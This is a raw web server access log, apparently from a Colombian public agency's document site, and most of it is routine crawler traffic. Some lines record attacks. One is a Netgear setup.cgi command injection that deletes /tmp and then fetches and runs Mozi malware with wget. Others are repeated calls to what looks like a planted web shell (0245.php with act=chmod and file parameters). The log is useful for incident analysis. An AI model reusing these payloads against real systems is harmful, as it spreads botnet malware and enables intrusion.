40.77.167.28 - - [04/Jul/2024:01:43:53 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2004%2F HTTP/1.1" 200 33860
192.178.6.7 - - [04/Jul/2024:01:44:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8753.pdf HTTP/1.1" 200 447294
201.245.192.253 - - [04/Jul/2024:01:44:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
192.178.6.5 - - [04/Jul/2024:01:44:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20151-200/00000166.tif HTTP/1.1" 200 129912
201.245.192.253 - - [04/Jul/2024:01:44:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:43:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:01:45:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:44:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [04/Jul/2024:01:46:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:01:46:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [04/Jul/2024:01:47:14 -0500] "HEAD / HTTP/1.1" 200 -
192.178.6.6 - - [04/Jul/2024:01:47:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0393.pdf HTTP/1.1" 200 248535
201.245.192.253 - - [04/Jul/2024:01:47:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:01:48:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [04/Jul/2024:01:48:12 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:01:48:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:01:48:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:01:49:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
173.252.83.112 - - [04/Jul/2024:01:49:59 -0500] "GET /robots.txt HTTP/1.1" 404 1034
173.252.83.19 - - [04/Jul/2024:01:49:59 -0500] "GET /semana-ambiental-2022-del-31-de-mayo-al-5-de-junio-se-celebrara-en-bogota.html HTTP/1.1" 200 799
201.245.192.253 - - [04/Jul/2024:01:50:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:01:50:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:49:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.178.6.6 - - [04/Jul/2024:01:51:25 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202021/2604.pdf HTTP/1.1" 304 -
192.178.6.5 - - [04/Jul/2024:01:51:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201801-1850/00001830.tif HTTP/1.1" 200 160470
201.245.192.253 - - [04/Jul/2024:01:51:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:49:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [04/Jul/2024:01:52:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:01:52:14 -0500] "HEAD / HTTP/1.1" 200 -
192.178.6.7 - - [04/Jul/2024:01:52:25 -0500] "GET /BLA/resoluciones/AUTOS%202013/0035.pdf HTTP/1.1" 200 1991064
192.178.6.6 - - [04/Jul/2024:01:52:25 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/1156.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:01:52:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:01:53:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:01:53:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:01:54:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
192.178.6.5 - - [04/Jul/2024:01:54:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3453.pdf HTTP/1.1" 200 517373
192.178.6.5 - - [04/Jul/2024:01:54:27 -0500] "GET /isolucionsda/FrameSetGeneral.asp?Pagina=RetencionDocumental.asp HTTP/1.1" 200 6376
201.245.192.253 - - [04/Jul/2024:01:54:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
34.68.218.197 - - [04/Jul/2024:01:55:07 -0500] "GET / HTTP/1.1" 200 319
192.178.6.5 - - [04/Jul/2024:01:55:17 -0500] "GET /isolucionsda/Administracion/Salaedicion/Articulo.asp?IdArticulo=%20%%3E&Accion=Editar&AccionPreview.x= HTTP/1.1" 500 7321
192.178.6.6 - - [04/Jul/2024:01:55:18 -0500] "GET /isolucionsda/Encabezado.asp HTTP/1.1" 200 11400
192.178.6.7 - - [04/Jul/2024:01:55:18 -0500] "GET /isolucionsda/Scripts/jquery.min.js HTTP/1.1" 200 89503
192.178.6.7 - - [04/Jul/2024:01:55:19 -0500] "GET /isolucionsda/Scripts/app/Security/changePassword.js HTTP/1.1" 200 3973
192.178.6.7 - - [04/Jul/2024:01:55:18 -0500] "GET /isolucionsda/Content/bootstrap/bootstrap.css HTTP/1.1" 200 172657
192.178.6.5 - - [04/Jul/2024:01:55:19 -0500] "GET /isolucionsda/Content/themes/custom/jquery-ui.css HTTP/1.1" 200 34502
192.178.6.7 - - [04/Jul/2024:01:55:19 -0500] "GET /isolucionsda/Scripts/jsUtilities.js HTTP/1.1" 200 136227
192.178.6.6 - - [04/Jul/2024:01:55:19 -0500] "GET /isolucionsda/Scripts/customRequired/mainHeader.js HTTP/1.1" 200 2727
192.178.6.7 - - [04/Jul/2024:01:55:18 -0500] "GET /isolucionsda/Content/themes/custom/jquery-ui.js HTTP/1.1" 200 554782
192.178.6.6 - - [04/Jul/2024:01:55:20 -0500] "GET /isolucionsda/Content/toastr.css HTTP/1.1" 200 7184
192.178.6.6 - - [04/Jul/2024:01:55:20 -0500] "GET /isolucionsda/Scripts/bootstrap/bootstrap.js HTTP/1.1" 200 150935
192.178.6.6 - - [04/Jul/2024:01:55:20 -0500] "GET /isolucionsda/Scripts/customRequired/relativePath.js HTTP/1.1" 404 3616
192.178.6.5 - - [04/Jul/2024:01:55:20 -0500] "GET /isolucionsda/Scripts/knockout-3.5.1.js HTTP/1.1" 200 68388
192.178.6.7 - - [04/Jul/2024:01:55:21 -0500] "GET /isolucionsda/Scripts/customRequired/MenuUser.js HTTP/1.1" 200 9345
192.178.6.7 - - [04/Jul/2024:01:55:21 -0500] "GET /isolucionsda/Content/isolucion/isolucion-menu-4.5.css HTTP/1.1" 200 2586
192.178.6.5 - - [04/Jul/2024:01:55:21 -0500] "GET /isolucionsda/Scripts/knockout-3.5.1.debug.js HTTP/1.1" 200 324750
192.178.6.6 - - [04/Jul/2024:01:55:22 -0500] "GET /isolucionsda/Scripts/customRequired/ajaxRequestExtension.js HTTP/1.1" 200 1268
192.178.6.6 - - [04/Jul/2024:01:55:22 -0500] "GET /isolucionsda/Scripts/customRequired/relativePath.js HTTP/1.1" 404 3616
192.178.6.5 - - [04/Jul/2024:01:55:22 -0500] "POST /isolucionsda/Generics/General/GetMenuFromCurrentUser.ashx HTTP/1.1" 200 4
192.178.6.6 - - [04/Jul/2024:01:55:22 -0500] "POST /isolucionsda/Generics/General/GetUserData.ashx HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:01:55:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.55.39.10 - - [04/Jul/2024:01:55:34 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20008%20del%2001%20de%20noviembre%20de%202019.pdf HTTP/1.1" 200 1382642
172.22.2.4 - - [04/Jul/2024:01:55:51 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [04/Jul/2024:01:56:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:01:56:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:54:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Jul/2024:01:57:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:01:55:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47256
201.245.192.253 - - [04/Jul/2024:01:57:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:55:52 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 48027
201.245.192.253 - - [04/Jul/2024:01:58:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:01:58:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:01:58:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.178.6.6 - - [04/Jul/2024:01:58:41 -0500] "GET /robots.txt HTTP/1.1" 404 1018
192.178.6.6 - - [04/Jul/2024:01:58:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201301-1350/00001321.tif HTTP/1.1" 200 100868
201.245.192.253 - - [04/Jul/2024:01:59:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:01:58:51 -0500] "GET /BLA/boletinlegal/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 32715
201.245.192.253 - - [04/Jul/2024:02:00:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:02:00:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.178.6.6 - - [04/Jul/2024:02:01:01 -0500] "GET /robots.txt HTTP/1.1" 404 1018
192.178.6.7 - - [04/Jul/2024:02:01:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9690.pdf HTTP/1.1" 200 331310
192.178.6.7 - - [04/Jul/2024:02:01:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0234.pdf HTTP/1.1" 304 -
47.128.37.150 - - [04/Jul/2024:02:01:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4785.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [04/Jul/2024:02:01:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.37.191 - - [04/Jul/2024:02:01:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4185.pdf HTTP/1.1" 200 2714
47.128.37.147 - - [04/Jul/2024:02:01:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=02100.pdf HTTP/1.1" 200 2739
47.128.37.149 - - [04/Jul/2024:02:02:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3877.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [04/Jul/2024:02:02:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:02:02:13 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jul/2024:02:00:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.59.206 - - [04/Jul/2024:02:02:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4950.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [04/Jul/2024:02:02:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.125.103 - - [04/Jul/2024:02:02:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=00294.pdf HTTP/1.1" 200 2739
47.128.54.250 - - [04/Jul/2024:02:02:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=03902.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [04/Jul/2024:02:03:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
47.128.125.132 - - [04/Jul/2024:02:03:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&f=search4.xml HTTP/1.1" 200 2739
172.22.2.4 - - [04/Jul/2024:02:01:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51561
47.128.18.12 - - [04/Jul/2024:02:03:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=05542.pdf HTTP/1.1" 200 2714
157.55.39.48 - - [04/Jul/2024:02:03:30 -0500] "GET /Publicaciones/2024EE54527.pdf HTTP/1.1" 404 227
201.245.192.253 - - [04/Jul/2024:02:03:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.38.54 - - [04/Jul/2024:02:03:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=00951.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [04/Jul/2024:02:04:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
192.178.6.7 - - [04/Jul/2024:02:04:27 -0500] "GET /robots.txt HTTP/1.1" 404 1018
192.178.6.6 - - [04/Jul/2024:02:04:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1384.pdf HTTP/1.1" 200 159681
192.178.6.5 - - [04/Jul/2024:02:04:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4006.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:02:04:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.55.39.201 - - [04/Jul/2024:02:05:22 -0500] "GET /BLA/resoluciones/AUTOS%202022/2935.pdf HTTP/1.1" 200 415003
192.178.6.7 - - [04/Jul/2024:02:05:28 -0500] "GET /BLA/resoluciones/AUTOS%202018/5068.pdf HTTP/1.1" 304 -
192.178.6.5 - - [04/Jul/2024:02:05:28 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [04/Jul/2024:02:05:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.23.190 - - [04/Jul/2024:02:05:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=02088.pdf HTTP/1.1" 200 2740
192.178.6.5 - - [04/Jul/2024:02:05:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201151-1200/00001192.tif HTTP/1.1" 200 185848
47.128.54.132 - - [04/Jul/2024:02:06:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4186.pdf HTTP/1.1" 200 2714
162.55.167.166 - - [04/Jul/2024:02:06:06 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [04/Jul/2024:02:06:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
42.186.123.7 - - [04/Jul/2024:02:06:13 -0500] "GET /galeria/galeria/fotos/Humedal-Tibanica3P.jpg HTTP/1.1" 200 28016
47.128.45.44 - - [04/Jul/2024:02:06:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2573a.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:02:06:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.40.227 - - [04/Jul/2024:02:06:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4293.pdf HTTP/1.1" 200 2714
47.128.56.214 - - [04/Jul/2024:02:06:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4063.pdf HTTP/1.1" 200 2714
172.22.2.4 - - [04/Jul/2024:02:06:59 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [04/Jul/2024:02:07:00 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [04/Jul/2024:02:07:00 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [04/Jul/2024:02:07:01 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [04/Jul/2024:02:07:01 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [04/Jul/2024:02:07:01 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [04/Jul/2024:02:07:01 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [04/Jul/2024:02:07:01 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [04/Jul/2024:02:07:02 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [04/Jul/2024:02:07:02 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [04/Jul/2024:02:07:02 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
47.128.24.111 - - [04/Jul/2024:02:07:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5240.pdf HTTP/1.1" 200 2714
216.245.221.92 - - [04/Jul/2024:02:07:13 -0500] "HEAD / HTTP/1.1" 200 -
47.128.53.30 - - [04/Jul/2024:02:07:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=sess_mo3o8kfm1gv90hqeer106dep80 HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:02:07:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
27.43.206.160 - - [04/Jul/2024:02:07:32 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
47.128.38.169 - - [04/Jul/2024:02:07:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5289.pdf HTTP/1.1" 200 2714
47.128.16.127 - - [04/Jul/2024:02:07:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4250.pdf HTTP/1.1" 200 2738
47.128.38.203 - - [04/Jul/2024:02:08:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=02159.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [04/Jul/2024:02:08:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:02:08:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [04/Jul/2024:02:06:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.178.6.6 - - [04/Jul/2024:02:08:28 -0500] "GET /robots.txt HTTP/1.1" 404 1018
192.178.6.5 - - [04/Jul/2024:02:08:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9570.pdf HTTP/1.1" 200 372392
201.245.192.253 - - [04/Jul/2024:02:08:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:02:07:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50303
201.245.192.253 - - [04/Jul/2024:02:09:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:02:10:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [04/Jul/2024:02:08:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [04/Jul/2024:02:10:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.178.6.7 - - [04/Jul/2024:02:11:29 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C-596-10.doc HTTP/1.1" 200 36352
201.245.192.253 - - [04/Jul/2024:02:11:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:02:12:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:02:12:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:02:12:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
192.178.6.7 - - [04/Jul/2024:02:13:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20401-450/00000439.tif HTTP/1.1" 200 487494
201.245.192.253 - - [04/Jul/2024:02:13:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:02:13:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:02:12:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:02:14:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [04/Jul/2024:02:14:21 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [04/Jul/2024:02:14:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:02:13:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
192.178.6.5 - - [04/Jul/2024:02:15:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9259.pdf HTTP/1.1" 200 485575
192.178.6.6 - - [04/Jul/2024:02:15:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0174.pdf HTTP/1.1" 200 411582
192.178.6.5 - - [04/Jul/2024:02:15:25 -0500] "GET /Publicaciones/2024EE110522.pdf HTTP/1.1" 404 228
201.245.192.253 - - [04/Jul/2024:02:15:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:02:16:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:02:16:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [04/Jul/2024:02:17:13 -0500] "HEAD / HTTP/1.1" 200 -
192.178.6.7 - - [04/Jul/2024:02:17:25 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000009%20DEL%2010%20DE%20OCTUBRE%20DEL%202023.pdf HTTP/1.1" 200 529599
201.245.192.253 - - [04/Jul/2024:02:17:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:02:17:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34986
201.245.192.253 - - [04/Jul/2024:02:16:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38708
201.245.192.253 - - [04/Jul/2024:02:18:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
185.224.128.43 - - [04/Jul/2024:02:18:07 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [04/Jul/2024:02:18:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.110.240 - - [04/Jul/2024:02:18:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4657.pdf HTTP/1.1" 200 2739
192.178.6.5 - - [04/Jul/2024:02:18:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3557.pdf HTTP/1.1" 200 675657
201.245.192.253 - - [04/Jul/2024:02:18:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.31 - - [04/Jul/2024:02:18:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4690.pdf HTTP/1.1" 200 2739
47.128.36.38 - - [04/Jul/2024:02:18:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4935.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:02:19:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33632
201.245.192.253 - - [04/Jul/2024:02:19:31 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.254 - - [04/Jul/2024:02:19:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4677.pdf HTTP/1.1" 200 2714
47.128.49.182 - - [04/Jul/2024:02:19:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4470.pdf HTTP/1.1" 200 2739
172.22.2.4 - - [04/Jul/2024:02:18:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.46.135 - - [04/Jul/2024:02:20:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4750.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [04/Jul/2024:02:20:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
